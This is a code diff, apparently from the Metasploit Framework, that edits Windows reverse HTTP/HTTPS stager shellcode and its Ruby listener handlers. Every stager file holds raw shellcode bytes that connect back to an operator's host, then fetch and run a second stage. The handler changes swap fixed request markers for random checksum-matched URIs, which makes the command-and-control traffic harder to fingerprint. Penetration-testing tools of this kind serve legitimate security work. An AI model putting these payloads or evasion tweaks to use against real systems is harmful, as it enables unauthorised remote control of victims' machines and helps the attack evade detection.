diff --git a/external/source/shellcode/windows/x86/src/block/block_reverse_http.asm b/external/source/shellcode/windows/x86/src/block/block_reverse_http.asm
index 90c44359d9..438738a99d 100644
--- a/external/source/shellcode/windows/x86/src/block/block_reverse_http.asm
+++ b/external/source/shellcode/windows/x86/src/block/block_reverse_http.asm
@@ -12,7 +12,6 @@
 load_wininet:
   push 0x0074656e        ; Push the bytes 'wininet',0 onto the stack.
   push 0x696e6977        ; ...
-  mov esi, esp           ; Save a pointer to wininet
   push esp               ; Push a pointer to the "wininet" string on the stack.
   push 0x0726774C        ; hash( "kernel32.dll", "LoadLibraryA" )
   call ebp               ; LoadLibraryA( "wininet" )
@@ -23,7 +22,8 @@ internetopen:
   push edi               ; LPCTSTR lpszProxyBypass
   push edi               ; LPCTSTR lpszProxyName
   push edi               ; DWORD dwAccessType (PRECONFIG = 0)
-  push esi               ; LPCTSTR lpszAgent ("wininet\x00")
+  push byte 0            ; NULL pointer
+  push esp               ; LPCTSTR lpszAgent ("\x00")
   push 0xA779563A        ; hash( "wininet.dll", "InternetOpenA" )
   call ebp
 
diff --git a/external/source/shellcode/windows/x86/src/block/block_reverse_https.asm b/external/source/shellcode/windows/x86/src/block/block_reverse_https.asm
index 8679472710..7128d93317 100644
--- a/external/source/shellcode/windows/x86/src/block/block_reverse_https.asm
+++ b/external/source/shellcode/windows/x86/src/block/block_reverse_https.asm
@@ -12,7 +12,6 @@
 load_wininet:
   push 0x0074656e        ; Push the bytes 'wininet',0 onto the stack.
   push 0x696e6977        ; ...
-  mov esi, esp           ; Save a pointer to wininet
   push esp               ; Push a pointer to the "wininet" string on the stack.
   push 0x0726774C        ; hash( "kernel32.dll", "LoadLibraryA" )
   call ebp               ; LoadLibraryA( "wininet" )
@@ -23,7 +22,8 @@ internetopen:
   push edi               ; LPCTSTR lpszProxyBypass
   push edi               ; LPCTSTR lpszProxyName
   push edi               ; DWORD dwAccessType (PRECONFIG = 0)
-  push esi               ; LPCTSTR lpszAgent ("wininet\x00")
+  push byte 0            ; NULL pointer  
+  push esp               ; LPCTSTR lpszAgent ("\x00")
   push 0xA779563A        ; hash( "wininet.dll", "InternetOpenA" )
   call ebp
 
diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb
index a2f179a3db..dc241353cc 100644
--- a/lib/msf/core/handler/reverse_http.rb
+++ b/lib/msf/core/handler/reverse_http.rb
@@ -29,6 +29,49 @@ module ReverseHttp
 		"tunnel"
 	end
 
+	#
+	# Define 8-bit checksums for matching URLs
+	# These are based on charset frequency
+	#
+	URI_CHECKSUM_INITW = 92
+	URI_CHECKSUM_INITJ = 88
+	URI_CHECKSUM_CONN  = 98
+	
+	#
+	# Map "random" URIs to static strings, allowing us to randomize
+	# the URI sent in the first request.
+	# 
+	def process_uri_resource(uri_match)
+		# This allows 'random' strings to be used as markers for
+		# the INIT and CONN request types, based on a checksum
+		uri_strip, uri_conn = uri_match.split('_', 2)
+		uri_strip.sub!(/^\//, '')
+		uri_check = Rex::Text.checksum8(uri_strip)
+		
+		# Match specific checksums and map them to static URIs
+		case uri_check
+		when URI_CHECKSUM_INITW
+			uri_match = "/INITM" 
+		when URI_CHECKSUM_INITJ
+			uri_match = "/INITJM"
+		when URI_CHECKSUM_CONN
+			uri_match = "/CONN_" + ( uri_conn || Rex::Text.rand_text_alphanumeric(16) )
+		end 
+		
+		uri_match
+	end
+	
+	#
+	# Create a URI that matches a given checksum
+	#
+	def generate_uri_checksum(sum)
+		0.upto(1000) do 
+			uri = Rex::Text.rand_text_alphanumeric(4)
+			return uri if Rex::Text.checksum8(uri) == sum
+		end
+		raise RuntimeError, "Unable to generate a string with checksum #{sum}"
+	end
+	
 	#
 	# Initializes the HTTP SSL tunneling handler.
 	#
@@ -139,13 +182,15 @@ protected
 		end
 		
 		lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
-
+		
+		uri_match = process_uri_resource(req.relative_resource)
+		
 		# Process the requested resource.
-		case req.relative_resource
+		case uri_match
 			when /^\/INITJM/
 				print_line("Java: #{req.relative_resource}")
 
-				conn_id = "CONN_" + Rex::Text.rand_text_alphanumeric(16)
+				conn_id = generate_uri_checksum(URI_CHECKSUM_CONN) + "_" + Rex::Text.rand_text_alphanumeric(16)
 				url = "http://#{lhost}:#{datastore['LPORT']}/" + conn_id + "/\x00"
 				print_line "URL: #{url.inspect}"
 
@@ -192,7 +237,7 @@ protected
 				end
 				print_status("Patched transport at offset #{i}...")
 
-				conn_id = "CONN_" + Rex::Text.rand_text_alphanumeric(16)
+				conn_id = generate_uri_checksum(URI_CHECKSUM_CONN) + "_" + Rex::Text.rand_text_alphanumeric(16)
 				i = blob.index("https://" + ("X" * 256))
 				if i
 					url = "http://#{lhost}:#{datastore['LPORT']}/" + conn_id + "/\x00"
@@ -248,7 +293,7 @@ protected
 					})
 				end
 			else
-				print_status("#{cli.peerhost}:#{cli.peerport} Unknown request to #{req.relative_resource} #{req.inspect}...")
+				print_status("#{cli.peerhost}:#{cli.peerport} Unknown request to #{uri_match} #{req.inspect}...")
 				resp.code    = 200
 				resp.message = "OK"
 				resp.body    = "<h3>No site configured at this address</h3>"
@@ -265,4 +310,3 @@ end
 
 end
 end
-
diff --git a/lib/msf/core/handler/reverse_https.rb b/lib/msf/core/handler/reverse_https.rb
index cb9939ad13..a8148a88f3 100644
--- a/lib/msf/core/handler/reverse_https.rb
+++ b/lib/msf/core/handler/reverse_https.rb
@@ -29,6 +29,50 @@ module ReverseHttps
 		"tunnel"
 	end
 
+	#
+	# Define 8-bit checksums for matching URLs
+	# These are based on charset frequency
+	#
+	URI_CHECKSUM_INITW = 92
+	URI_CHECKSUM_INITJ = 88
+	URI_CHECKSUM_CONN  = 98
+	
+	#
+	# Map "random" URIs to static strings, allowing us to randomize
+	# the URI sent in the first request.
+	# 
+	def process_uri_resource(uri_match)
+
+		# This allows 'random' strings to be used as markers for
+		# the INIT and CONN request types, based on a checksum
+		uri_strip, uri_conn = uri_match.split('_', 2)
+		uri_strip.sub!(/^\//, '')
+		uri_check = Rex::Text.checksum8(uri_strip)
+		
+		# Match specific checksums and map them to static URIs
+		case uri_check
+		when URI_CHECKSUM_INITW
+			uri_match = "/INITM" 
+		when URI_CHECKSUM_INITJ
+			uri_match = "/INITJM"
+		when URI_CHECKSUM_CONN
+			uri_match = "/CONN_" + ( uri_conn || Rex::Text.rand_text_alphanumeric(16) )
+		end 
+		
+		uri_match
+	end
+	
+	#
+	# Create a URI that matches a given checksum
+	#
+	def generate_uri_checksum(sum)
+		0.upto(1000) do 
+			uri = Rex::Text.rand_text_alphanumeric(4)
+			return uri if Rex::Text.checksum8(uri) == sum
+		end
+		raise RuntimeError, "Unable to generate a string with checksum #{sum}"
+	end
+	
 	#
 	# Initializes the HTTP SSL tunneling handler.
 	#
@@ -137,16 +181,18 @@ protected
 		lhost = datastore['LHOST']
 		
 		# Default to our own IP if the user specified 0.0.0.0 (pebkac avoidance)
-		if lhost.empty? or lhost == '0.0.0.0'or lhost == '::'
+		if lhost.empty? or lhost == '0.0.0.0' or lhost == '::'
 			lhost = Rex::Socket.source_address(cli.peerhost)
 		end
 
 		lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
 		
+		uri_match = process_uri_resource(req.relative_resource)
+		
 		# Process the requested resource.
-		case req.relative_resource
+		case uri_match
 			when /^\/INITJM/
-				conn_id = "CONN_" + Rex::Text.rand_text_alphanumeric(16)
+				conn_id = generate_uri_checksum(URI_CHECKSUM_CONN) + "_" + Rex::Text.rand_text_alphanumeric(16)
 				url = "https://#{lhost}:#{datastore['LPORT']}/" + conn_id + "/\x00"
 				#$stdout.puts "URL: #{url.inspect}"
 
@@ -192,7 +238,7 @@ protected
 				end
 				print_status("Patched transport at offset #{i}...")
 
-				conn_id = "CONN_" + Rex::Text.rand_text_alphanumeric(16)
+				conn_id = generate_uri_checksum(URI_CHECKSUM_CONN) + "_" + Rex::Text.rand_text_alphanumeric(16)
 				i = blob.index("https://" + ("X" * 256))
 				if i
 					url = "https://#{lhost}:#{datastore['LPORT']}/" + conn_id + "/\x00"
@@ -246,7 +292,7 @@ protected
 					})
 				end
 			else
-				print_status("#{cli.peerhost}:#{cli.peerport} Unknown request to #{req.relative_resource} #{req.inspect}...")
+				print_status("#{cli.peerhost}:#{cli.peerport} Unknown request to #{uri_match} #{req.inspect}...")
 				resp.code    = 200
 				resp.message = "OK"
 				resp.body    = "<h3>No site configured at this address</h3>"
diff --git a/lib/rex/text.rb b/lib/rex/text.rb
index b3974f2cbd..d18ba7ced3 100644
--- a/lib/rex/text.rb
+++ b/lib/rex/text.rb
@@ -1214,6 +1214,26 @@ protected
 		@@codepage_map_cache = map
 	end
 
+	def self.checksum8(str)
+		str.unpack("C*").inject(:+) % 0x100
+	end
+	
+	def self.checksum16_le(str)
+		str.unpack("v*").inject(:+) % 0x10000
+	end
+
+	def self.checksum16_be(str)
+		str.unpack("n*").inject(:+) % 0x10000
+	end
+
+	def self.checksum32_le(str)
+		str.unpack("V*").inject(:+) % 0x100000000
+	end
+
+	def self.checksum32_be(str)
+		str.unpack("N*").inject(:+) % 0x100000000
+	end
+
 end
 end
 
diff --git a/modules/payloads/stagers/windows/reverse_http.rb b/modules/payloads/stagers/windows/reverse_http.rb
index 8f5b9f9c98..6b669ff713 100644
--- a/modules/payloads/stagers/windows/reverse_http.rb
+++ b/modules/payloads/stagers/windows/reverse_http.rb
@@ -38,28 +38,28 @@ module Metasploit3
 							# 'EXITFUNC' => [ 290, 'V' ],
 							'LPORT'    => [ 190, 'v' ], # Not a typo, really little endian
 						},
-					'Payload' =>
-						"\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
-						"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
-						"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
-						"\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
-						"\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
-						"\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
-						"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
-						"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
-						"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
-						"\x68\x6E\x65\x74\x00\x68\x77\x69\x6E\x69\x89\xE6\x54\x68\x4C\x77" +
-						"\x26\x07\xFF\xD5\x31\xFF\x57\x57\x57\x57\x56\x68\x3A\x56\x79\xA7" +
-						"\xFF\xD5\xEB\x4B\x5B\x31\xC9\x51\x51\x6A\x03\x51\x51\x68\x5C\x11" +
-						"\x00\x00\x53\x50\x68\x57\x89\x9F\xC6\xFF\xD5\xEB\x34\x59\x31\xD2" +
-						"\x52\x68\x00\x02\x20\x84\x52\x52\x52\x51\x52\x50\x68\xEB\x55\x2E" +
-						"\x3B\xFF\xD5\x89\xC6\x6A\x10\x5B\x31\xFF\x57\x57\x57\x57\x56\x68" +
-						"\x2D\x06\x18\x7B\xFF\xD5\x85\xC0\x75\x1A\x4B\x74\x10\xEB\xE9\xEB" +
-						"\x49\xE8\xC7\xFF\xFF\xFF\x2F\x31\x32\x33\x34\x35\x00\x68\xF0\xB5" +
-						"\xA2\x56\xFF\xD5\x6A\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00" +
-						"\x57\x68\x58\xA4\x53\xE5\xFF\xD5\x93\x53\x53\x89\xE7\x57\x68\x00" +
-						"\x20\x00\x00\x53\x56\x68\x12\x96\x89\xE2\xFF\xD5\x85\xC0\x74\xCD" +
-						"\x8B\x07\x01\xC3\x85\xC0\x75\xE5\x58\xC3\xE8\x65\xFF\xFF\xFF"
+					'Payload' =>			
+							"\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
+							"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
+							"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
+							"\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
+							"\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
+							"\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
+							"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
+							"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
+							"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
+							"\x68\x6E\x65\x74\x00\x68\x77\x69\x6E\x69\x54\x68\x4C\x77\x26\x07" +
+							"\xFF\xD5\x31\xFF\x57\x57\x57\x57\x6A\x00\x54\x68\x3A\x56\x79\xA7" +
+							"\xFF\xD5\xEB\x4B\x5B\x31\xC9\x51\x51\x6A\x03\x51\x51\x68\x5C\x11" +
+							"\x00\x00\x53\x50\x68\x57\x89\x9F\xC6\xFF\xD5\xEB\x34\x59\x31\xD2" +
+							"\x52\x68\x00\x02\x20\x84\x52\x52\x52\x51\x52\x50\x68\xEB\x55\x2E" +
+							"\x3B\xFF\xD5\x89\xC6\x6A\x10\x5B\x31\xFF\x57\x57\x57\x57\x56\x68" +
+							"\x2D\x06\x18\x7B\xFF\xD5\x85\xC0\x75\x1A\x4B\x74\x10\xEB\xE9\xEB" +
+							"\x49\xE8\xC7\xFF\xFF\xFF\x2F\x31\x32\x33\x34\x35\x00\x68\xF0\xB5" +
+							"\xA2\x56\xFF\xD5\x6A\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00" +
+							"\x57\x68\x58\xA4\x53\xE5\xFF\xD5\x93\x53\x53\x89\xE7\x57\x68\x00" +
+							"\x20\x00\x00\x53\x56\x68\x12\x96\x89\xE2\xFF\xD5\x85\xC0\x74\xCD" +
+							"\x8B\x07\x01\xC3\x85\xC0\x75\xE5\x58\xC3\xE8\x65\xFF\xFF\xFF"
 				}
 			))
 	end
@@ -77,7 +77,7 @@ module Metasploit3
 	def generate
 		p = super
 		i = p.index("/12345\x00")
-		u = "/INITM\x00"
+		u = "/" + generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITW) + "\x00"
 		p[i, u.length] = u
 		p + datastore['LHOST'].to_s + "\x00"
 	end
diff --git a/modules/payloads/stagers/windows/reverse_https.rb b/modules/payloads/stagers/windows/reverse_https.rb
index 3ab266f567..ec84371aaa 100644
--- a/modules/payloads/stagers/windows/reverse_https.rb
+++ b/modules/payloads/stagers/windows/reverse_https.rb
@@ -48,8 +48,8 @@ module Metasploit3
 						"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
 						"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
 						"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
-						"\x68\x6E\x65\x74\x00\x68\x77\x69\x6E\x69\x89\xE6\x54\x68\x4C\x77" +
-						"\x26\x07\xFF\xD5\x31\xFF\x57\x57\x57\x57\x56\x68\x3A\x56\x79\xA7" +
+						"\x68\x6E\x65\x74\x00\x68\x77\x69\x6E\x69\x54\x68\x4C\x77\x26\x07" +
+						"\xFF\xD5\x31\xFF\x57\x57\x57\x57\x6A\x00\x54\x68\x3A\x56\x79\xA7" +
 						"\xFF\xD5\xEB\x5F\x5B\x31\xC9\x51\x51\x6A\x03\x51\x51\x68\x5C\x11" +
 						"\x00\x00\x53\x50\x68\x57\x89\x9F\xC6\xFF\xD5\xEB\x48\x59\x31\xD2" +
 						"\x52\x68\x00\x32\xA0\x84\x52\x52\x52\x51\x52\x50\x68\xEB\x55\x2E" +
@@ -79,7 +79,7 @@ module Metasploit3
 	def generate
 		p = super
 		i = p.index("/12345\x00")
-		u = "/INITM\x00"
+		u = "/" + generate_uri_checksum(Msf::Handler::ReverseHttps::URI_CHECKSUM_INITW) + "\x00"
 		p[i, u.length] = u
 		p + datastore['LHOST'].to_s + "\x00"
 	end
diff --git a/modules/payloads/stagers/windows/reverse_ipv6_http.rb b/modules/payloads/stagers/windows/reverse_ipv6_http.rb
index 82f23f7600..cc15f9f259 100644
--- a/modules/payloads/stagers/windows/reverse_ipv6_http.rb
+++ b/modules/payloads/stagers/windows/reverse_ipv6_http.rb
@@ -39,27 +39,27 @@ module Metasploit3
 							'LPORT'    => [ 190, 'v' ], # Not a typo, really little endian
 						},
 					'Payload' =>
-						"\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
-						"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
-						"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
-						"\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
-						"\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
-						"\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
-						"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
-						"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
-						"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
-						"\x68\x6E\x65\x74\x00\x68\x77\x69\x6E\x69\x89\xE6\x54\x68\x4C\x77" +
-						"\x26\x07\xFF\xD5\x31\xFF\x57\x57\x57\x57\x56\x68\x3A\x56\x79\xA7" +
-						"\xFF\xD5\xEB\x4B\x5B\x31\xC9\x51\x51\x6A\x03\x51\x51\x68\x5C\x11" +
-						"\x00\x00\x53\x50\x68\x57\x89\x9F\xC6\xFF\xD5\xEB\x34\x59\x31\xD2" +
-						"\x52\x68\x00\x02\x20\x84\x52\x52\x52\x51\x52\x50\x68\xEB\x55\x2E" +
-						"\x3B\xFF\xD5\x89\xC6\x6A\x10\x5B\x31\xFF\x57\x57\x57\x57\x56\x68" +
-						"\x2D\x06\x18\x7B\xFF\xD5\x85\xC0\x75\x1A\x4B\x74\x10\xEB\xE9\xEB" +
-						"\x49\xE8\xC7\xFF\xFF\xFF\x2F\x31\x32\x33\x34\x35\x00\x68\xF0\xB5" +
-						"\xA2\x56\xFF\xD5\x6A\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00" +
-						"\x57\x68\x58\xA4\x53\xE5\xFF\xD5\x93\x53\x53\x89\xE7\x57\x68\x00" +
-						"\x20\x00\x00\x53\x56\x68\x12\x96\x89\xE2\xFF\xD5\x85\xC0\x74\xCD" +
-						"\x8B\x07\x01\xC3\x85\xC0\x75\xE5\x58\xC3\xE8\x65\xFF\xFF\xFF"
+							"\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
+							"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
+							"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
+							"\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
+							"\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
+							"\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
+							"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
+							"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
+							"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
+							"\x68\x6E\x65\x74\x00\x68\x77\x69\x6E\x69\x54\x68\x4C\x77\x26\x07" +
+							"\xFF\xD5\x31\xFF\x57\x57\x57\x57\x6A\x00\x54\x68\x3A\x56\x79\xA7" +
+							"\xFF\xD5\xEB\x4B\x5B\x31\xC9\x51\x51\x6A\x03\x51\x51\x68\x5C\x11" +
+							"\x00\x00\x53\x50\x68\x57\x89\x9F\xC6\xFF\xD5\xEB\x34\x59\x31\xD2" +
+							"\x52\x68\x00\x02\x20\x84\x52\x52\x52\x51\x52\x50\x68\xEB\x55\x2E" +
+							"\x3B\xFF\xD5\x89\xC6\x6A\x10\x5B\x31\xFF\x57\x57\x57\x57\x56\x68" +
+							"\x2D\x06\x18\x7B\xFF\xD5\x85\xC0\x75\x1A\x4B\x74\x10\xEB\xE9\xEB" +
+							"\x49\xE8\xC7\xFF\xFF\xFF\x2F\x31\x32\x33\x34\x35\x00\x68\xF0\xB5" +
+							"\xA2\x56\xFF\xD5\x6A\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00" +
+							"\x57\x68\x58\xA4\x53\xE5\xFF\xD5\x93\x53\x53\x89\xE7\x57\x68\x00" +
+							"\x20\x00\x00\x53\x56\x68\x12\x96\x89\xE2\xFF\xD5\x85\xC0\x74\xCD" +
+							"\x8B\x07\x01\xC3\x85\xC0\x75\xE5\x58\xC3\xE8\x65\xFF\xFF\xFF"
 				}
 			))
 	end
@@ -77,7 +77,7 @@ module Metasploit3
 	def generate
 		p = super
 		i = p.index("/12345\x00")
-		u = "/INITM\x00"
+		u = "/" + generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITW) + "\x00"
 		p[i, u.length] = u
 		
 		lhost = datastore['LHOST'] || "0000:0000:0000:0000:0000:0000:0000:0000"
@@ -94,5 +94,6 @@ module Metasploit3
 	def wfs_delay
 		20
 	end
+
 end
 
diff --git a/modules/payloads/stagers/windows/reverse_ipv6_https.rb b/modules/payloads/stagers/windows/reverse_ipv6_https.rb
index ec01ff346e..95b2d2af2e 100644
--- a/modules/payloads/stagers/windows/reverse_ipv6_https.rb
+++ b/modules/payloads/stagers/windows/reverse_ipv6_https.rb
@@ -48,8 +48,8 @@ module Metasploit3
 						"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
 						"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
 						"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
-						"\x68\x6E\x65\x74\x00\x68\x77\x69\x6E\x69\x89\xE6\x54\x68\x4C\x77" +
-						"\x26\x07\xFF\xD5\x31\xFF\x57\x57\x57\x57\x56\x68\x3A\x56\x79\xA7" +
+						"\x68\x6E\x65\x74\x00\x68\x77\x69\x6E\x69\x54\x68\x4C\x77\x26\x07" +
+						"\xFF\xD5\x31\xFF\x57\x57\x57\x57\x6A\x00\x54\x68\x3A\x56\x79\xA7" +
 						"\xFF\xD5\xEB\x5F\x5B\x31\xC9\x51\x51\x6A\x03\x51\x51\x68\x5C\x11" +
 						"\x00\x00\x53\x50\x68\x57\x89\x9F\xC6\xFF\xD5\xEB\x48\x59\x31\xD2" +
 						"\x52\x68\x00\x32\xA0\x84\x52\x52\x52\x51\x52\x50\x68\xEB\x55\x2E" +
@@ -79,7 +79,7 @@ module Metasploit3
 	def generate
 		p = super
 		i = p.index("/12345\x00")
-		u = "/INITM\x00"
+		u = "/" + generate_uri_checksum(Msf::Handler::ReverseHttps::URI_CHECKSUM_INITW) + "\x00"
 		p[i, u.length] = u
 
 		lhost = datastore['LHOST'] || "0000:0000:0000:0000:0000:0000:0000:0000"